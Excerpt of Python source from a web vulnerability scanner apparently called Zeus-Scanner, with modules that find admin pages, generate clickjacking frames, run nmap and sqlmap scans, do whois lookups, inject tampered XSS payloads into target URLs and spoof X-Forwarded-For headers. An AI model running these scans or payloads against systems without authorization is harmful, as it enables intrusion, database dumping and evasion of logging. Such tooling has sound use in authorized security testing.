241 | tasks = []
242 | for _ in range(0, proc_num):
243 | t = threading.Thread(target=check_for_admin_page, args=(url, extensions), kwargs={
244 | "verbose": verbose,
245 | "show_possibles": show
246 | })
247 | t.daemon = True
248 | tasks.append(t)
249 | for thread in tasks:
250 | thread.start()
251 | thread.join()
252 | else:
253 | check_for_admin_page(url, extensions, show_possibles=show, verbose=verbose)
254 | except KeyboardInterrupt:
255 | if not lib.core.common.pause():
256 | lib.core.common.shutdown()
--------------------------------------------------------------------------------
/lib/attacks/clickjacking_scan/__init__.py:
--------------------------------------------------------------------------------
1 | import lib.core.common
2 | import lib.core.settings
3 | import var.auto_issue.github
4 |
5 |
6 | class ClickJackingScanner(object):
7 |
8 | def __init__(self, url):
9 | self.url = url
10 | self.safe = lib.core.common.HTTP_HEADER.X_FRAME_OPT
11 | self.html = open(lib.core.settings.CLICKJACKING_TEST_PAGE_PATH).read()
12 |
13 | def generate_html(self):
14 | """
15 | generate the HTML page for the clickjacking, it's up to you
16 | to put it into play
17 | """
18 | return self.html.format(self.url)
19 |
20 | def extract_and_test_headers(self, **kwargs):
21 | """
22 | extract the headers from the url given to test if they contain the correct protection
23 | against clickjacking
24 | """
25 | proxy = kwargs.get("proxy", None)
26 | agent = kwargs.get("agent", None)
27 | forward = kwargs.get("forward", None)
28 | if forward is not None:
29 | ip_addrs = lib.core.settings.create_random_ip()
30 | headers = {
31 | lib.core.common.HTTP_HEADER.USER_AGENT: agent,
32 | lib.core.common.HTTP_HEADER.X_FORWARDED_FOR: "{}, {}, {}".format(
33 | ip_addrs[0], ip_addrs[1], ip_addrs[2]
34 | ),
35 | lib.core.common.HTTP_HEADER.CONNECTION: "close"
36 | }
37 | else:
38 | headers = {
39 | lib.core.common.HTTP_HEADER.USER_AGENT: agent,
40 | lib.core.common.HTTP_HEADER.CONNECTION: "close"
41 | }
42 | req, _, _, headers = lib.core.common.get_page(self.url, headers=headers, proxy=proxy)
43 | headers = req.headers
44 | if self.safe in headers:
45 | return False
46 | return True
47 |
48 |
49 | def clickjacking_main(url, **kwargs):
50 | """
51 | main function for the clickjacking scan
52 | """
53 | agent = kwargs.get("agent", None)
54 | proxy = kwargs.get("proxy", None)
55 | forward = kwargs.get("forward", None)
56 | verbose = kwargs.get("verbose", False)
57 | batch = kwargs.get("batch", False)
58 |
59 | if not batch:
60 | if lib.core.settings.URL_QUERY_REGEX.match(url):
61 | question = lib.core.common.prompt(
62 | "it is recommended to use a URL without a GET(query) parameter, "
63 | "heuristic testing has detected that the URL provided contains a "
64 | "GET(query) parameter in it, would you like to continue", opts="yN"
65 | )
66 | if question.lower().startswith("n"):
67 | lib.core.settings.logger.info(lib.core.settings.set_color(
68 | "automatically removing all queries from URL"
69 | ))
70 | url = "http://{}".format(lib.core.settings.replace_http(url, complete=True))
71 |
72 | scanner = ClickJackingScanner(url)
73 |
74 | if verbose:
75 | lib.core.settings.logger.debug(lib.core.settings.set_color(
76 | "generating HTML", level=10
77 | ))
78 |
79 | data = scanner.generate_html()
80 |
81 | if verbose:
82 | lib.core.settings.logger.debug(lib.core.settings.set_color(
83 | "HTML generated successfully", level=10
84 | ))
85 | print("{}\n{}\n{}".format("-" * 30, data, "-" * 30))
86 |
87 | try:
88 | results = scanner.extract_and_test_headers(agent=agent, proxy=proxy, forward=forward)
89 |
90 | if results:
91 | lib.core.settings.logger.info(lib.core.settings.set_color(
92 | "it appears that provided URL '{}' is vulnerable to clickjacking, writing "
93 | "to HTML file".format(url), level=25
94 | ))
95 | lib.core.common.write_to_log_file(
96 | data,
97 | lib.core.settings.CLICKJACKING_RESULTS_PATH,
98 | lib.core.settings.CLICKJACKING_FILENAME.format(lib.core.settings.replace_http(url))
99 | )
100 | else:
101 | lib.core.settings.logger.error(lib.core.settings.set_color(
102 | "provided URL '{}' seems to have the correct protection from clickjacking".format(
103 | url
104 | ), level=40
105 | ))
106 | except KeyboardInterrupt:
107 | if not lib.core.common.pause():
108 | lib.core.common.shutdown()
109 | except Exception as e: # until I figure out the errors, we'll just make issues about them
110 | lib.core.settings.logger.exception(lib.core.settings.set_color(
111 | "Zeus failed to process the clickjacking test and received "
112 | "error code '{}'".format(e), level=50
113 | ))
114 | var.auto_issue.github.request_issue_creation()
115 |
--------------------------------------------------------------------------------
/lib/attacks/nmap_scan/__init__.py:
--------------------------------------------------------------------------------
1 | import json
2 | import socket
3 |
4 | import nmap
5 |
6 | import lib.core.common
7 | import lib.core.errors
8 | import lib.core.settings
9 | import lib.core.decorators
10 | from var.auto_issue.github import request_issue_creation
11 |
12 |
13 | class NmapHook(object):
14 |
15 | """
16 | Nmap API hook, uses python, must have nmap on your system
17 | """
18 |
19 | NM = nmap.PortScanner()
20 |
21 | def __init__(self, ip, **kwargs):
22 | self.ip = ip
23 | self.verbose = kwargs.get("verbose", False)
24 | self.pretty = kwargs.get("pretty", True)
25 | self.dir = lib.core.settings.PORT_SCAN_LOG_PATH
26 | self.file = lib.core.settings.NMAP_FILENAME
27 | self.opts = kwargs.get("opts", "")
28 |
29 | def get_all_info(self):
30 | """
31 | get all the information from the scan
32 | """
33 | if isinstance(self.opts, (list, tuple)):
34 | self.opts = ""
35 | scanned_data = self.NM.scan(self.ip, arguments=self.opts)
36 | if self.pretty:
37 | scanned_data = json.dumps(scanned_data, indent=4, sort_keys=True)
38 | return scanned_data
39 |
40 | def send_to_file(self, data):
41 | """
42 | send all the information to a JSON file for further use
43 | """
44 | return lib.core.common.write_to_log_file(
45 | data, lib.core.settings.NMAP_LOG_FILE_PATH,
46 | lib.core.settings.NMAP_FILENAME.format(self.ip)
47 | )
48 |
49 | def show_open_ports(self, json_data, sep="-" * 30):
50 | """
51 | outputs the current scan information
52 | """
53 | # have to create a spacer or the output comes out funky..
54 | spacer_data = {4: " " * 8, 6: " " * 6, 8: " " * 4}
55 | lib.core.settings.logger.info(lib.core.settings.set_color("finding data for IP '{}'".format(self.ip)))
56 | json_data = json.loads(json_data)["scan"]
57 | host = json_data[self.ip]["hostnames"][0]["name"]
58 | host_skip = (not len(host) == 0, " ", "", None)
59 | print(
60 | "{}\nScanned: {} ({})\tStatus: {}\nProtocol: {}\n".format(
61 | sep, self.ip,
62 | host if host != any(s for s in list(host_skip)) else "unknown",
63 | json_data[self.ip]["status"]["state"],
64 | "TCP"
65 | )
66 | )
67 | oports = json_data[self.ip]["tcp"].keys()
68 | oports.sort()
69 | for port in oports:
70 | port_status = json_data[self.ip]["tcp"][port]["state"]
71 | # output the found port information..
72 | print(
73 | "Port: {}\tStatus: {}{}Type: {}".format(
74 | port, json_data[self.ip]["tcp"][port]["state"],
75 | spacer_data[len(port_status)],
76 | json_data[self.ip]["tcp"][port]["name"]
77 | )
78 | )
79 | print("{}".format(sep))
80 |
81 |
82 | def find_nmap(item_name="nmap"):
83 | """
84 | find nmap on the users system if they do not specify a path for it or it is not in their PATH
85 | """
86 | return lib.core.settings.find_application(item_name)
87 |
88 |
89 | def perform_port_scan(url, scanner=NmapHook, **kwargs):
90 | """
91 | main function that will initalize the port scanning
92 | """
93 | verbose = kwargs.get("verbose", False)
94 | opts = kwargs.get("opts", None)
95 | timeout_time = kwargs.get("timeout", None)
96 |
97 | if timeout_time is None:
98 | timeout_time = 120
99 |
100 | with lib.core.decorators.TimeOut(seconds=timeout_time):
101 | lib.core.settings.logger.warning(lib.core.settings.set_color(
102 | "if the port scan is not completed in {}(m) it will timeout".format(
103 | lib.core.settings.convert_to_minutes(timeout_time)
104 | ), level=30
105 | ))
106 | url = url.strip()
107 | lib.core.settings.logger.info(lib.core.settings.set_color(
108 | "attempting to find IP address for hostname '{}'".format(url)
109 | ))
110 |
111 | try:
112 | found_ip_address = socket.gethostbyname(url)
113 | except socket.gaierror:
114 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
115 | "failed to gather IP address for URL '{}'".format(url)
116 | ))
117 | return
118 |
119 | if verbose:
120 | lib.core.settings.logger.debug(lib.core.settings.set_color(
121 | "checking for nmap on your system", level=10
122 | ))
123 | nmap_exists = "".join(find_nmap())
124 | if nmap_exists:
125 | if verbose:
126 | lib.core.settings.logger.debug(lib.core.settings.set_color(
127 | "nmap has been found under '{}'".format(nmap_exists), level=10
128 | ))
129 | lib.core.settings.logger.info(lib.core.settings.set_color(
130 | "starting port scan on IP address '{}'".format(found_ip_address)
131 | ))
132 | try:
133 | data = scanner(found_ip_address, opts=opts)
134 | json_data = data.get_all_info()
135 | data.show_open_ports(json_data)
136 | file_path = data.send_to_file(json_data)
137 | lib.core.settings.logger.info(lib.core.settings.set_color(
138 | "port scan completed, all data saved to JSON file under '{}'".format(file_path)
139 | ))
140 | except KeyError:
141 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
142 | "no port information found for '{}({})'".format(
143 | url, found_ip_address
144 | ), level=50
145 | ))
146 | except KeyboardInterrupt:
147 | if not lib.core.common.pause():
148 | lib.core.common.shutdown()
149 | except lib.core.errors.PortScanTimeOutException:
150 | lib.core.settings.logger.error(lib.core.settings.set_color(
151 | "port scan is taking to long and has hit the timeout, you "
152 | "can increase this time by passing the --time-sec flag (IE "
153 | "--time-sec 300)", level=40
154 | ))
155 | except Exception as e:
156 | lib.core.settings.logger.exception(lib.core.settings.set_color(
157 | "ran into exception '{}', cannot continue quitting".format(e), level=50
158 | ))
159 | request_issue_creation()
160 | pass
161 | else:
162 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
163 | "nmap was not found on your system", level=50
164 | ))
165 | lib.core.common.run_fix(
166 | "would you like to automatically install it",
167 | "sudo sh {}".format(lib.core.settings.NMAP_INSTALLER_TOOL),
168 | "nmap is not installed, please install it in order to continue"
169 | )
--------------------------------------------------------------------------------
/lib/attacks/nmap_scan/nmap_opts.py:
--------------------------------------------------------------------------------
1 | NMAP_API_OPTS = {
2 | "-iL", "-iR", "--exclude", "--excludefile", "-sL",
3 | "-sn", "-Pn", "-PS", "-PA", "-PU", "-PY", "-PE",
4 | "-PP", "-PM", "-PO", "-n", "-R", "--dns-servers", "--system-dns",
5 | "--traceroute", "-sS", "-sT", "-sA", "-sW", "-sM", "-sU", "-sN",
6 | "-sF", "-sX", "--scanflags", "-sI", "-sY", "-sZ", "-sO", "-b",
7 | "-p", "--exclude-ports", "-F", "-r",
8 | "--top-ports", "--port-ratio", "-sV", "--version-intensity",
9 | "--version-light", "--version-all", "--version-trace", "-sC",
10 | "--script", "--script-args", "--script-args-file", "--script-trace",
11 | "--script-updatedb", "--script-help", "-O", "--osscan-limit",
12 | "--osscan-guess", "-T", "--min-hostgroup", "--max-hostgroup",
13 | "--min-parallelism", "--max-parallelism", "--min-rtt-timeout", "--max-rtt-timeout",
14 | "--initial-rtt-timeout", "--max-retries", "--host-timeout", "--scan-delay",
15 | "--max-scan-delay", "--min-rate", "--max-rate", "-f", "--mtu", "-D", "-S", "-e",
16 | "-g", "--source-port", "--proxies", "--data",
17 | "--data-string", "--data-length", "--ip-options", "--ttl",
18 | "--spoof-mac", "--badsum", "-oN", "-oX", "-oS", "-oG", "-oA", "-v",
19 | "-d", "--reason", "--open", "--packet-trace",
20 | "--iflist", "--append-output", "--resume", "--stylesheet",
21 | "--webxml", "--no-stylesheet", "-6", "-A",
22 | "--datadir", "--send-eth/--send-ip", "--privileged", "--unprivileged", "-V", "-h",
23 | }
24 |
--------------------------------------------------------------------------------
/lib/attacks/sqlmap_scan/__init__.py:
--------------------------------------------------------------------------------
1 | import json
2 | import re
3 | import subprocess
4 | import shlex
5 |
6 | try:
7 | import urllib2 # python 2
8 | except ImportError:
9 | import urllib as urllib2 # python 3
10 |
11 | import requests
12 |
13 | import lib.core.common
14 | import lib.core.settings
15 | import lib.core.errors
16 | import lib.attacks
17 |
18 | from var.auto_issue.github import request_issue_creation
19 |
20 |
21 | class SqlmapHook(object):
22 |
23 | """
24 | Sqlmap API hook, will process API requests, and output API data
25 | """
26 |
27 | def __init__(self, to_scan, port=None, api_con="http://127.0.0.1:{}", default_port=8775):
28 | self.to_scan = to_scan
29 | self.port = port or default_port
30 | self.headers = {"Content-Type": "application/json"}
31 | self.connection = api_con.format(self.port)
32 | self.commands = {
33 | "init": "/task/new",
34 | "id": "/admin/0/list",
35 | "start": "/scan/{}/start",
36 | "status": "/scan/{}/status",
37 | "log": "/scan/{}/log"
38 | }
39 |
40 | def init_new_scan(self):
41 | """
42 | create a new API scan
43 | """
44 | new_scan_url = "{}{}".format(self.connection, self.commands["init"])
45 | return requests.get(new_scan_url, params=self.headers)
46 |
47 | def get_scan_id(self, split_by=16):
48 | """
49 | get the ID of the current API scan
50 | """
51 | current_scan_id = None
52 | id_re = re.compile(r"[a-fA-F0-9]{16}")
53 | api_id_url = "{}{}".format(self.connection, self.commands["id"])
54 | req = requests.get(api_id_url)
55 | to_check = str(json.loads(req.content)["tasks"]).lower()
56 | found = ''.join(id_re.findall(to_check))
57 | if len(found) > 16:
58 | # split the found ID by 16 characters each time one is found to be over 16 characters
59 | # IE ['abcdee345593fffa', '2222aaa449837cc9']
60 | # if any of these items are not in the already used container, then chances are that's the
61 | # item we're looking for.
62 | # this will also allow you to go back to the same item more then once.
63 | data_found = [found[i:i+split_by] for i in range(0, len(found), split_by)]
64 | for item in data_found:
65 | if item not in lib.core.settings.ALREADY_USED:
66 | lib.core.settings.ALREADY_USED.add(item)
67 | current_scan_id = item
68 | else:
69 | lib.core.settings.ALREADY_USED.add(found)
70 | current_scan_id = found
71 | return current_scan_id
72 |
73 | def start_scan(self, api_id, opts=None):
74 | """
75 | start the API scan
76 | """
77 | start_scan_url = "{}{}".format(self.connection, self.commands["start"].format(api_id))
78 | data_dict = {"url": self.to_scan}
79 | if opts is not None:
80 | for i in range(0, len(opts)):
81 | # if the options are passed they will be placed as a dict
82 | # IE {'level': 5, 'risk': 3}
83 | # from there they will be added into the post data dict what this
84 | # will accomplish is that it will take precedence over the already
85 | # set data on the sqlmap API client and replace that data with the
86 | # data that is provided.
87 | # IE
88 | # {
89 | # 'level': 1,
90 | # 'risk': 1,
91 | # }
92 | # will become
93 | # {
94 | # 'level': '5',
95 | # 'risk': '3',
96 | # }
97 | data_dict[opts[i][0]] = opts[i][1]
98 | post_data = json.dumps(data_dict)
99 | req = urllib2.Request(start_scan_url, data=post_data, headers=self.headers)
100 | return urllib2.urlopen(req)
101 |
102 | def show_sqlmap_log(self, api_id):
103 | """
104 | show the sqlmap log during the API scan
105 | """
106 | running_status_url = "{}{}".format(self.connection, self.commands["status"].format(api_id))
107 | running_log_url = "{}{}".format(self.connection, self.commands["log"].format(api_id))
108 | status_req = requests.get(running_status_url)
109 | status_json = json.loads(status_req.content)
110 | current_status = status_json["status"]
111 | if current_status != "running":
112 | raise lib.core.errors.SqlmapFailedStart(
113 | "sqlmap API failed to start the run, check the client and see what "
114 | "the problem is and try again"
115 | )
116 | already_displayed = set()
117 | while current_status == "running":
118 | # while the current status evaluates to `running`
119 | # we can load the JSON data and output the log information
120 | # we will skip over information that has already been provided
121 | # by using the already displayed container set.
122 | # this will allow us to only output information that we
123 | # have not seen yet.
124 | current_status = json.loads(requests.get(running_status_url).content)["status"]
125 | log_req = requests.get(running_log_url)
126 | log_json = json.loads(log_req.content)
127 | for i in range(0, len(log_json["log"])):
128 | if log_json["log"][i]["message"] in already_displayed:
129 | pass
130 | else:
131 | print(
132 | "sqlmap> [{} {}] {}".format(
133 | log_json["log"][i]["time"],
134 | log_json["log"][i]["level"],
135 | log_json["log"][i]["message"]
136 | )
137 | )
138 | already_displayed.add(log_json["log"][i]["message"])
139 |
140 |
141 | def find_sqlmap(to_find="sqlmap"):
142 | """
143 | find sqlmap on the users system
144 | """
145 | found_path = lib.core.settings.find_application(to_find)
146 | return found_path
147 |
148 |
149 | def sqlmap_scan_main(url, port=None, verbose=None, opts=None, auto_start=False):
150 | """
151 | the main function that will be called and initialize everything
152 | """
153 |
154 | is_started = lib.core.settings.search_for_process("sqlmapapi.py")
155 | found_path = find_sqlmap()
156 |
157 | if auto_start:
158 | lib.core.settings.logger.info(lib.core.settings.set_color(
159 | "attempting to launch sqlmap API"
160 | ))
161 | sqlmap_api_command = shlex.split("sudo sh {} p {}".format(
162 | lib.core.settings.LAUNCH_SQLMAP_API_TOOL, "".join(found_path)
163 | ))
164 | subprocess.Popen(sqlmap_api_command, stdout=subprocess.PIPE)
165 | if is_started:
166 | lib.core.settings.logger.info(lib.core.settings.set_color(
167 | "sqlmap API is up and running, continuing process"
168 | ))
169 | else:
170 | lib.core.settings.logger.error(lib.core.settings.set_color(
171 | "there was a problem starting sqlmap API", level=40
172 | ))
173 | lib.core.common.prompt(
174 | "manually start the API and press enter when ready"
175 | )
176 | else:
177 | if not is_started:
178 | lib.core.common.prompt(
179 | "sqlmap API is not started, start it and press enter to continue"
180 | )
181 | try:
182 | sqlmap_scan = SqlmapHook(url, port=port)
183 | lib.core.settings.logger.info(lib.core.settings.set_color(
184 | "initializing new sqlmap scan with given URL '{}'".format(url)
185 | ))
186 | sqlmap_scan.init_new_scan()
187 | if verbose:
188 | lib.core.settings.logger.debug(lib.core.settings.set_color(
189 | "scan initialized", level=10
190 | ))
191 | lib.core.settings.logger.info(lib.core.settings.set_color(
192 | "gathering sqlmap API scan ID"
193 | ))
194 | api_id = sqlmap_scan.get_scan_id()
195 | if verbose:
196 | lib.core.settings.logger.debug(lib.core.settings.set_color(
197 | "current sqlmap scan ID: '{}'".format(api_id), level=10
198 | ))
199 | lib.core.settings.logger.info(lib.core.settings.set_color(
200 | "starting sqlmap scan on url: '{}'".format(url), level=25
201 | ))
202 | if opts:
203 | if verbose:
204 | lib.core.settings.logger.debug(lib.core.settings.set_color(
205 | "using arguments: '{}'".format(opts), level=10
206 | ))
207 | lib.core.settings.logger.info(lib.core.settings.set_color(
208 | "adding arguments to sqlmap API"
209 | ))
210 | else:
211 | if verbose:
212 | lib.core.settings.logger.debug(lib.core.settings.set_color(
213 | "no arguments passed, skipping", level=10
214 | ))
215 | lib.core.settings.logger.warning(lib.core.settings.set_color(
216 | "please keep in mind that this is the API, output will "
217 | "not be saved to log file, it may take a little longer "
218 | "to finish processing, launching sqlmap", level=30
219 | ))
220 | sqlmap_scan.start_scan(api_id, opts=opts)
221 | print("-" * 30)
222 | sqlmap_scan.show_sqlmap_log(api_id)
223 | print("-" * 30)
224 | except requests.exceptions.HTTPError as e:
225 | lib.core.settings.logger.exception(lib.core.settings.set_color(
226 | "ran into error '{}', seems you didn't start the server, check "
227 | "the server port and try again".format(e), level=50
228 | ))
229 | pass
230 | except KeyboardInterrupt:
231 | if not lib.core.common.pause():
232 | lib.core.common.shutdown()
233 | except Exception as e:
234 | if "HTTPConnectionPool(host='127.0.0.1'" in str(e):
235 | lib.core.settings.logger.error(lib.core.settings.set_color(
236 | "sqlmap API is not started, did you forget to start it? "
237 | "You will need to open a new terminal, cd into sqlmap, and "
238 | "run `python sqlmapapi.py -s` otherwise pass the correct flags "
239 | "to auto start the API", level=40
240 | ))
241 | pass
242 | else:
243 | lib.core.settings.logger.exception(lib.core.settings.set_color(
244 | "ran into error '{}', seems something went wrong, error has "
245 | "been saved to current log file.".format(e), level=50
246 | ))
247 | request_issue_creation()
248 | pass
249 |
--------------------------------------------------------------------------------
/lib/attacks/sqlmap_scan/sqlmap_opts.py:
--------------------------------------------------------------------------------
1 | SQLMAP_API_OPTIONS = {
2 | "crawlDepth", "osShell", "getUsers", "getPasswordHashes", "excludeSysDbs", "ignoreTimeouts",
3 | "regData", "prefix", "code", "googlePage", "skip", "query", "randomAgent", "osPwn", "authType",
4 | "safeUrl", "requestFile", "predictOutput", "wizard", "stopFail", "forms",
5 | "uChar", "pivotColumn", "dropSetCookie", "smart", "paramExclude", "risk",
6 | "sqlFile", "rParam", "getCurrentUser", "notString", "getRoles", "getPrivileges",
7 | "testParameter", "tbl", "charset", "trafficFile", "osSmb", "level",
8 | "dnsDomain", "skipStatic", "secondOrder", "outputDir", "skipWaf", "timeout",
9 | "firstChar", "torPort", "getComments", "binaryFields", "checkTor", "commonTables",
10 | "direct", "tmpPath", "titles", "getSchema", "identifyWaf", "paramDel",
11 | "safeReqFile", "regKey", "murphyRate", "limitStart", "crawlExclude", "flushSession",
12 | "loadCookies", "csvDel" ",", "offline", "method", "tmpDir", "disablePrecon",
13 | "osBof", "testSkip", "invalidLogical", "getCurrentDb", "hexConvert", "proxyFile",
14 | "answers", "host", "dependencies", "cookie", "proxy", "regType",
15 | "optimize", "limitStop", "search", "uFrom", "noCast", "testFilter",
16 | "ignoreCode", "eta", "csrfToken", "threads", "logFile", "os",
17 | "col", "rFile", "proxyCred", "verbose", "isDba", "updateAll",
18 | "privEsc", "forceDns", "getAll", "invalidBignum", "regexp", "getDbs",
19 | "freshQueries", "uCols", "smokeTest", "wFile", "udfInject", "invalidString",
20 | "tor", "forceSSL", "beep", "noEscape", "configFile", "scope",
21 | "authFile", "torType" "SOCKS5", "regVal", "dummy", "checkInternet", "safePost",
22 | "skipUrlEncode", "referer", "liveTest", "purgeOutput", "retries", "extensiveFp",
23 | "dumpTable", "getColumns", "batch", "headers", "authCred", "osCmd",
24 | "suffix", "dbmsCred", "regDel", "shLib", "sitemapUrl", "timeSec",
25 | "msfPath", "dumpAll", "getHostname", "sessionFile", "disableColoring", "getTables",
26 | "safeFreq", "agent", "webRoot", "lastChar", "string", "dbms",
27 | "dumpWhere", "tamper", "ignoreRedirects" "hpp", "runCase", "delay",
28 | "evalCode", "cleanup", "csrfUrl", "getBanner", "profile", "regRead",
29 | "bulkFile", "db", "excludeCol", "dumpFormat", "alert", "harFile",
30 | "Connection", "user", "parseErrors", "getCount", "dFile", "data",
31 | "regAdd", "ignoreProxy", "mobile", "googleDork", "saveConfig", "sqlShell",
32 | "tech", "textOnly", "cookieDel", "commonColumns", "keepAlive"
33 | }
34 |
--------------------------------------------------------------------------------
/lib/attacks/whois_lookup/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/lib/attacks/whois_lookup/__init__.py
--------------------------------------------------------------------------------
/lib/attacks/whois_lookup/whois.py:
--------------------------------------------------------------------------------
1 | import json
2 | import time
3 | import urllib2
4 |
5 | import lib.core.common
6 | import lib.core.settings
7 |
8 |
9 | def gather_raw_whois_info(domain):
10 | """
11 | get the raw JSON data for from the whois API
12 | """
13 | auth_headers = {
14 | lib.core.common.HTTP_HEADER.CONTENT_TYPE: "application/json",
15 | lib.core.common.HTTP_HEADER.AUTHORIZATION: "Token {}".format(lib.core.settings.get_token(lib.core.settings.WHOIS_AUTH_PATH)),
16 | }
17 | request = urllib2.Request(
18 | lib.core.settings.WHOIS_JSON_LINK.format(domain), headers=auth_headers
19 | )
20 | data = urllib2.urlopen(request).read()
21 | _json_data = json.loads(data)
22 | return _json_data
23 |
24 |
25 | def _pretty_print_json(data, sort=True, indentation=4):
26 | return json.dumps(data, sort_keys=sort, indent=indentation)
27 |
28 |
29 | def get_interesting(raw_json):
30 | """
31 | return the interesting aspects of the whois lookup from the raw JSON data
32 | """
33 | nameservers = raw_json["nameservers"]
34 | user_contact = raw_json["contacts"]
35 | reg_info = raw_json["registrar"]
36 | return nameservers, user_contact, reg_info
37 |
38 |
39 | def human_readable_display(domain, interesting):
40 | """
41 | create a human readable display from the given whois lookup
42 | """
43 | data_sep = "-" * 30
44 | servers, contact, reg = interesting
45 | total_servers, total_contact, total_reg = len(servers), len(contact), len(reg)
46 | print(data_sep)
47 | print("[!] Domain {}".format(domain))
48 | if total_servers > 0:
49 | print("[!] Found a total of {} servers".format(total_servers))
50 | print(_pretty_print_json(servers))
51 | else:
52 | print("[x] No server information found")
53 | if total_contact > 0:
54 | print("[!] Found contact information")
55 | print(_pretty_print_json(contact))
56 | else:
57 | print("[x] No contact information found")
58 | if total_reg > 0:
59 | print("[!] Found register information")
60 | print(_pretty_print_json(reg))
61 | else:
62 | print("[x] No register information found")
63 | print(data_sep)
64 |
65 |
66 | def whois_lookup_main(domain, **kwargs):
67 | """
68 | main function
69 | """
70 | # sleep a little bit so that WhoIs doesn't stop us from making requests
71 | verbose = kwargs.get("verbose", False)
72 | timeout = kwargs.get("timeout", None)
73 | domain = lib.core.settings.replace_http(domain)
74 |
75 | try:
76 | lib.core.settings.logger.info(lib.core.settings.set_color(
77 | "performing WhoIs lookup on given domain '{}'".format(domain)
78 | ))
79 | if timeout is not None:
80 | time.sleep(timeout)
81 | try:
82 | raw_information = gather_raw_whois_info(domain)
83 | except Exception:
84 | lib.core.settings.logger.error(lib.core.settings.set_color(
85 | "unable to produce information from WhoIs lookup", level=40
86 | ))
87 | return None
88 | lib.core.settings.logger.info(lib.core.settings.set_color(
89 | "discovered raw information", level=25
90 | ))
91 | lib.core.settings.logger.info(lib.core.settings.set_color(
92 | "gathering interesting information"
93 | ))
94 | interesting_data = get_interesting(raw_information)
95 | if verbose:
96 | try:
97 | human_readable_display(domain, interesting_data)
98 | except (ValueError, Exception):
99 | lib.core.settings.logger.error(lib.core.settings.set_color(
100 | "unable to display any information from WhoIs lookup on domain '{}'".format(domain), level=50
101 | ))
102 | return None
103 | lib.core.common.write_to_log_file(
104 | raw_information, lib.core.settings.WHOIS_RESULTS_LOG_PATH,
105 | lib.core.settings.WHOIS_LOOKUP_FILENAME.format(domain)
106 | )
107 | except KeyboardInterrupt:
108 | if not lib.core.common.pause():
109 | lib.core.common.shutdown()
--------------------------------------------------------------------------------
/lib/attacks/xss_scan/__init__.py:
--------------------------------------------------------------------------------
1 | import os
2 | import re
3 | import tempfile
4 | import importlib
5 | try:
6 | import urlparse # python 2
7 | except ImportError:
8 | import urllib.parse as urlparse # python 3
9 |
10 | import requests
11 |
12 | import lib.core.common
13 | import lib.core.settings
14 | import lib.core.decorators
15 | from lib.core.errors import InvalidTamperProvided
16 |
17 |
18 | def list_tamper_scripts(path="{}/lib/tamper_scripts"):
19 | """
20 | create a list of available tamper scripts from the tamper script directory
21 | """
22 | retval = set()
23 | exclude = ["__init__.py", ".pyc"]
24 | for item in os.listdir(path.format(os.getcwd())):
25 | if not any(f in item for f in exclude):
26 | item = item.split(".")[0]
27 | item = item.split("_")[0]
28 | retval.add(item)
29 | return retval
30 |
31 |
32 | def assign_protocol(url, force=False):
33 | auto_assign = ("http://{}", "https://{}")
34 | url_verification = re.compile(r"http(s)?", re.I)
35 |
36 | if url_verification.search(url) is None:
37 | if not force:
38 | return auto_assign[0].format(url)
39 | else:
40 | return auto_assign[1].format(url)
41 | else:
42 | return url
43 |
44 |
45 | def __tamper_payload(payload, tamper_type, warning=True, **kwargs):
46 | """
47 | add the tamper to the payload from the given tamper type
48 | """
49 | verbose = kwargs.get("verbose", False)
50 | acceptable = list_tamper_scripts()
51 | tamper_list = tamper_type.split(",")
52 | for tamper in tamper_list:
53 | if warning:
54 | if verbose:
55 | lib.core.settings.logger.debug(lib.core.settings.set_color(
56 | "tampering payload with '{}'".format(tamper), level=10
57 | ))
58 | if tamper in acceptable:
59 | tamper_name = "lib.tamper_scripts.{}_encode"
60 | tamper_script = importlib.import_module(tamper_name.format(tamper))
61 | payload = tamper_script.tamper(payload, warning=warning)
62 | else:
63 | raise InvalidTamperProvided()
64 | return payload
65 |
66 |
67 | def __load_payloads(filename="{}/etc/text_files/xss_payloads.txt"):
68 | """
69 | load the tamper payloads from the etc/xss_payloads file
70 | """
71 | with open(filename.format(os.getcwd())) as payloads: return payloads.readlines()
72 |
73 |
74 | def create_urls(url, payload_list, tamper=None, verbose=False, force=False):
75 | """
76 | create the tampered URL's, write them to a temporary file and read them from there
77 | """
78 | tf = tempfile.NamedTemporaryFile(delete=False)
79 | tf_name = tf.name
80 | with tf as tmp:
81 | for i, payload in enumerate(payload_list):
82 | if tamper:
83 | try:
84 | if i < 1:
85 | payload = __tamper_payload(payload, tamper_type=tamper, warning=True, verbose=verbose)
86 | else:
87 | payload = __tamper_payload(payload, tamper_type=tamper, warning=False, verbose=verbose)
88 | except InvalidTamperProvided:
89 | lib.core.settings.logger.warning(lib.core.settings.set_color(
90 | "you provided and invalid tamper script, acceptable tamper scripts are: {}".format(
91 | " | ".join(list_tamper_scripts()), level=40
92 | )
93 | ))
94 | loaded_url = "{}{}\n".format(assign_protocol(url.strip(), force=force), payload.strip())
95 | tmp.write(loaded_url)
96 | return tf_name
97 |
98 |
99 | def find_xss_script(url, **kwargs):
100 | """
101 | parse the URL for the given XSS payload
102 | """
103 | data = urlparse.urlparse(url)
104 | payload_parser = {"path": 2, "query": 4, "fragment": 5}
105 | if data[payload_parser["fragment"]] is not "" or None:
106 | retval = "{}{}".format(
107 | data[payload_parser["query"]], data[payload_parser["fragment"]]
108 | )
109 | else:
110 | retval = data[payload_parser["query"]]
111 |
112 | # just double checking
113 | if retval == "" or None:
114 | retval = data[payload_parser["path"]]
115 | return retval
116 |
117 |
118 | def scan_xss(url, agent=None, proxy=None):
119 | """
120 | scan the payload to see if the XSS is still present in the HTML, if it is there's a very good
121 | chance that the URL is vulnerable to XSS attacks. Usually what will happen is the payload will
122 | be tampered or encoded if the site is not vulnerable
123 | """
124 |
125 | try:
126 | _, status, html_data, _ = lib.core.common.get_page(url, agent=agent, proxy=proxy)
127 | query = find_xss_script(url)
128 | for db in lib.core.settings.DBMS_ERRORS.keys():
129 | for item in lib.core.settings.DBMS_ERRORS[db]:
130 | if re.findall(item, html_data):
131 | return "sqli", db
132 | if status != 404:
133 | if query in html_data:
134 | return True, None
135 | return False, None
136 | except (requests.exceptions.ChunkedEncodingError, requests.exceptions.ConnectionError):
137 | return False, None
138 |
139 |
140 | def main_xss(start_url, proxy=None, agent=None, **kwargs):
141 | """
142 | main attack method to be called
143 | """
144 | tamper = kwargs.get("tamper", None)
145 | verbose = kwargs.get("verbose", False)
